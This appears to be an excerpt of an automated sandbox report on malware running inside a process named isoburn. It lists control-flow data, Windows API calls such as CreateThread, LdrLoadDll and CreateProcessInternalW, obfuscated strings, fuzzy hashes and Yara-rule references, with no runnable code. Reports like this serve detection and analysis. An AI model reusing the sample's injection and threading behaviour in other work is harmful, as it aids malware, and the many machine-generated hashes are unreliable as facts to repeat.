                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 28 2f99e36-2f99e37 29 2f99e39-2f9a152 28->29 30 2f99e0c-2f99e11 28->30 33 2f9a15c-2f9a163 29->33 31 2f99e30-2f99e35 30->31 32 2f99e13-2f99e2f call 2fbca47 CreateThread 30->32 35 2f9a19e 33->35 36 2f9a165-2f9a19c 33->36 38 2f9a1a5-2f9a1af 35->38 36->33 39 2f9a1b1-2f9a1cb 38->39 40 2f9a1e7-2f9a1f0 38->40 41 2f9a1cd-2f9a1d1 39->41 42 2f9a1d2-2f9a1d4 39->42 43 2f9a1f2-2f9a204 40->43 44 2f9a206-2f9a210 40->44 41->42 45 2f9a1e5 42->45 46 2f9a1d6-2f9a1df 42->46 43->40 47 2f9a221-2f9a22d 44->47 45->38 46->45 48 2f9a23d-2f9a241 47->48 49 2f9a22f-2f9a23b 47->49 50 2f9a25c-2f9a274 48->50 51 2f9a243-2f9a25a 48->51 49->47 53 2f9a285-2f9a291 50->53 51->48 54 2f9a2a8-2f9a2b2 53->54 55 2f9a293-2f9a2a6 53->55 56 2f9a2c3-2f9a2cf 54->56 55->53 58 2f9a2d1-2f9a2e3 56->58 59 2f9a2e5-2f9a2ee 56->59 58->56 60 2f9a510-2f9a517 59->60 61 2f9a2f4-2f9a2f7 59->61 63 2f9a519-2f9a548 60->63 64 2f9a54a-2f9a551 60->64 65 2f9a2fd-2f9a304 61->65 63->60 66 2f9a5c3-2f9a5cd 64->66 67 2f9a553-2f9a55d 64->67 68 2f9a32b-2f9a335 65->68 69 2f9a306-2f9a329 65->69 71 2f9a5de-2f9a5e7 66->71 72 2f9a56e-2f9a57a 67->72 70 2f9a346-2f9a352 68->70 69->65 73 2f9a365-2f9a36c 70->73 74 2f9a354-2f9a363 70->74 75 2f9a5e9-2f9a5fc 71->75 76 2f9a5fe-2f9a607 71->76 77 2f9a58d call 2fbb0e0 72->77 78 2f9a57c-2f9a58b 72->78 79 2f9a36e-2f9a391 73->79 80 2f9a393-2f9a39d 73->80 74->70 75->71 86 2f9a592-2f9a59e 77->86 83 2f9a55f-2f9a568 78->83 79->73 85 2f9a3ae-2f9a3ba 80->85 83->72 88 2f9a3cb-2f9a3da 85->88 89 2f9a3bc-2f9a3c9 85->89 86->66 87 2f9a5a0-2f9a5c1 86->87 87->86 90 2f9a40d-2f9a417 88->90 91 2f9a3dc-2f9a3e3 88->91 89->85 93 2f9a428-2f9a434 90->93 94 2f9a408 91->94 95 2f9a3e5-2f9a3fb 91->95 96 2f9a44a-2f9a454 93->96 97 2f9a436-2f9a448 93->97 94->60 98 2f9a3fd-2f9a403 95->98 99 2f9a406 95->99 100 2f9a465-2f9a471 96->100 97->93 98->99 99->91 102 2f9a493-2f9a499 100->102 103 2f9a473-2f9a480 100->103 106 2f9a49d-2f9a4a4 102->106 104 2f9a491 103->104 105 2f9a482-2f9a48b 103->105 104->100 105->104 108 2f9a4c9-2f9a4d3 106->108 109 2f9a4a6-2f9a4bc 106->109 110 2f9a4e4-2f9a4ed 108->110 111 2f9a4be-2f9a4c4 109->111 112 2f9a4c7 109->112 113 2f9a50b 110->113 114 2f9a4ef-2f9a4fb 110->114 111->112 112->106 113->59 115 2f9a509 114->115 116 2f9a4fd-2f9a503 114->116 115->110 116->115
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F99E25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                          • API String ID: 2422867632-999386047
                                                          • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                          • Instruction ID: ffe7755fe30e3606eb16b2e55163b0234ed885ab936a028b2564c6d0df084719
                                                          • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                          • Instruction Fuzzy Hash: F48166B0D05668CBEB20CF85C9597DEBAB1BB45308F1081D9D25C3B281C7BA1A89CF95
                                                          Function 02FAF3F9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                          • Instruction ID: ee6b41406f5bdc2022c71acf04365bc1e474642c29b1cda78ed85e4b5369f54f
                                                          • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                          • Instruction Fuzzy Hash: 8C4162B5A0020A9FDB00DFD8DC80DEEB7B9BF88344B108558EA05EB654D775AE05CBA0
                                                          Function 02FAF400 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                          • Instruction ID: 654801ea62c72a38c96ecfa0d922c321a82654c870b9ccd3ae100245a373fbe7
                                                          • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                          • Instruction Fuzzy Hash: 85312FB5A0060A9FDB10DFD8CC809EEB7B9BF88344B108559EA05AB214D775EE058BA0
                                                          Function 02FB3980 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02FB3A5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: wininet.dll
                                                          • API String ID: 3472027048-3354682871
                                                          • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                          • Instruction ID: cf936556e97def3e41f4770be30b9b5cc4cb81b710fee54a91862b136b7dad27
                                                          • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                          • Instruction Fuzzy Hash: BE31AEB5A00605BBDB14DFA5CC84FEBB7B9EF88754F50411DAA196B240D7706A40CBA4
                                                          Function 02FA4460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02FA44D2
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                          • Instruction ID: d86fe8eeb4a7beeb6fc2c5325a21e6b7a8c8ebdf864b76eae7931a4d068c8840
                                                          • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                          • Instruction Fuzzy Hash: A0015AB5E0020DABDF10EAE1DD51FDEB3B99F04748F0081A5AE0897240F670EB18CB91
                                                          Function 02FB97B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02FA820E,00000010,?,?,?,00000044,?,00000010,02FA820E,?,?,?), ref: 02FB9813
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                          • Instruction ID: 2ac1cb80e56b4ba15a562265523605384b00ff60102b30f3ed19327402aad932
                                                          • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                          • Instruction Fuzzy Hash: BA01C0B2200208BBCB14DE9DDC80EDB77AEAF8D750F008208BA09E3241D630F8518BA4
                                                          Function 02F99DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F99E25
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                          • Instruction ID: 0af9e41006943ab647103113d7a51007bbdef8745c86b965f448ae090b7ce6a2
                                                          • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                          • Instruction Fuzzy Hash: 7EF0657334031436E62061EE9C12FDBB38DCF85BA5F140029F70CEA2C0DAA1B84146A5
                                                          Function 02F99DDC Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F99E25
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                          • Instruction ID: bf642ac60101064d4cdd7e96115eb022bce05d9086aa385e1e83bf5e3f215f44
                                                          • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                          • Instruction Fuzzy Hash: BBF09B7228131437E53061A98C52FD7779DCF95B91F100019F70CEB2C0DAA5F84146F5
                                                          Function 02FB8300 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02FB8340
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Path$NameName_
                                                          • String ID:
                                                          • API String ID: 3514427675-0
                                                          • Opcode ID: 7a482533bfdaa3b503cc79b7355d131548c2471467f0cedb7971fce835a95fc5
                                                          • Instruction ID: 0e3a0518857081dbcf5556a330591a6376560f9458224e26ea3ad31b44dfd4d1
                                                          • Opcode Fuzzy Hash: 7a482533bfdaa3b503cc79b7355d131548c2471467f0cedb7971fce835a95fc5
                                                          • Instruction Fuzzy Hash: 3BF039B62106087BDA10EE69DC80EEB77ADEFC9750F008019FA08A7241D670B8118BF4
                                                          Function 02FB96D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(02FA1969,?,02FB57BB,02FA1969,02FB556F,02FB57BB,?,02FA1969,02FB556F,00001000,?,?,00000000), ref: 02FB970C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                          • Instruction ID: 97182e519e381f754ef90dcf5c03bc60ff415ec31be0f1cac9cfe1c2ee0956dc
                                                          • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                          • Instruction Fuzzy Hash: 20E06DB22042047BD714EE59DC40FEB77ADDFC9790F004019FA0CA7241D630B9108BB4
                                                          Function 02FB9720 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02FA3CE4,000000F4), ref: 02FB975C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                          • Instruction ID: e783b0ede9ad0c96d90f095683f412a42ac086875f18694d8aef6217a89e88fa
                                                          • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                          • Instruction Fuzzy Hash: BEE092722002057BEA14EF59DC85FEB37AEDFC9750F004419FA0CA7241C670B9108BB4
                                                          Function 02FA8250 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02FA827C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                          • Instruction ID: 45f99fb14457c762e60fc5567df2b3b95d4e349f19055c6e8373abb25aecf3d3
                                                          • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                          • Instruction Fuzzy Hash: 08E04FB564060826FE246AA89C55FB633989B487E8F5C46A0BE1C9B2C5E7B8F9414190
                                                          Function 02FA8037 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02FA1C50,02FB7EAF,02FB556F,02FA1C1D), ref: 02FA8073
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                          • Instruction ID: a5b1c4f1bafb34147865a579d139cca400eaeffcafe996400ac5e775f6563938
                                                          • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                          • Instruction Fuzzy Hash: 6EE0C2B16411006EFB10AAB89C16F96325C6B64798F0040A8B60CE7281DB70E0004524
                                                          Function 02FA8040 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02FA1C50,02FB7EAF,02FB556F,02FA1C1D), ref: 02FA8073
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                          • Instruction ID: 0573bfd28f85134ecd2502726cf632efe60675ee4bdb95529f20b25ca3df2463
                                                          • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                          • Instruction Fuzzy Hash: 33D05E716402087BFA10A6BA9C16F96328D5B057E8F448064BA0CE72C2EA64F00045B5
                                                          Function 02FA0D3B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111), ref: 02FA0D47
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                          • Instruction ID: 4f10f34ee1f5c6020c569cf99da9eaa66e64f3544846b358e344878440c0eda1
                                                          • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                          • Instruction Fuzzy Hash: 5AD0A767B0001C35A60145846CC1DFEB71CDB846A5F004067FF08D5040DA21590206B0
                                                          Function 05252C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6e29dafee212085108617f5471663735ceb67b63d27fb1901439ac68f27f1047
                                                          • Instruction ID: 483981a92a03de571d01ce8c45dc67838ff9d2c500e424d50e144848f5afff43
                                                          • Opcode Fuzzy Hash: 6e29dafee212085108617f5471663735ceb67b63d27fb1901439ac68f27f1047
                                                          • Instruction Fuzzy Hash: 11B02B738014C1C5DA00E3200608B1739007FD0301F16C021D3030241F0338C0C0E171

                                                          Non-executed Functions

                                                          Function 050B04F8 Relevance: .1, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505060030.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_50b0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                          • Instruction ID: d0a60af4084b4157790f8aa89e8a21e2ee41ec103cb36b146c87a3c63ee49774
                                                          • Opcode Fuzzy Hash: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                          • Instruction Fuzzy Hash: 3E41D67161CB0D8FE768EF68A0856FFB3E2FB55300F50052DD986C3652EAB4E8468645
                                                          Function 050BDF59 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505060030.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_50b0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                          • API String ID: 0-3558027158
                                                          • Opcode ID: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                          • Instruction ID: c3c3b4b4149ab06cd0bc96b4dd68a1286058f019b656211c57bd01ada7eaba1e
                                                          • Opcode Fuzzy Hash: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                          • Instruction Fuzzy Hash: A99150F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                          Function 05252890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 2c1ec869f444ba04659fe154a9e24ae088686c4bffda0126800ab5d666b9723b
                                                          • Instruction ID: cb06ba743be5ff7320ed8c5317127c7e7c793eac44f09356b28de263597e2eae
                                                          • Opcode Fuzzy Hash: 2c1ec869f444ba04659fe154a9e24ae088686c4bffda0126800ab5d666b9723b
                                                          • Instruction Fuzzy Hash: ED51F8B5A24116BFCB20DB9889C497EF7B9BF08210B54812AE869D7681D774DE4487E0
                                                          Function 052C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: e5304a8c7391ee8fcaf486b43459cfea1c8bb106cd8b8dd22d8f964453958323
                                                          • Instruction ID: e7906b8042b6af9ce0863f1eaa4898955941fcd7d47a03a2237ebfe091c870c1
                                                          • Opcode Fuzzy Hash: e5304a8c7391ee8fcaf486b43459cfea1c8bb106cd8b8dd22d8f964453958323
                                                          • Instruction Fuzzy Hash: 7251E879A10646EFCB34DF5CC89097FBBBAAF44240B0489DDE4D9D7642DAB4DA408760
                                                          Function 05247630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052846FC
                                                          • ExecuteOptions, xrefs: 052846A0
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 05284787
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05284725
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05284655
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05284742
                                                          • Execute=1, xrefs: 05284713
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: c25268dbe9080840b25891c5ccf842e7f98a67b0cc5d5c6882326c9dddc60dae
                                                          • Instruction ID: 74a76a3ba1ebdee154a976d224db90d623865988c51ebb5a429caa037e3a83a8
                                                          • Opcode Fuzzy Hash: c25268dbe9080840b25891c5ccf842e7f98a67b0cc5d5c6882326c9dddc60dae
                                                          • Instruction Fuzzy Hash: 5E511A31760219BADF19EBA4DC49FBA77ADFF04304F080099DA19A7180DB709A46CF50
                                                          Function 050B3BD9 Relevance: 12.6, Strings: 10, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505060030.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_50b0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                          • API String ID: 0-2612338985
                                                          • Opcode ID: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                          • Instruction ID: 79c862780cb4783d8a0437fbb8f4dfc37bbd172ca7b1df343bbe25911935d2ef
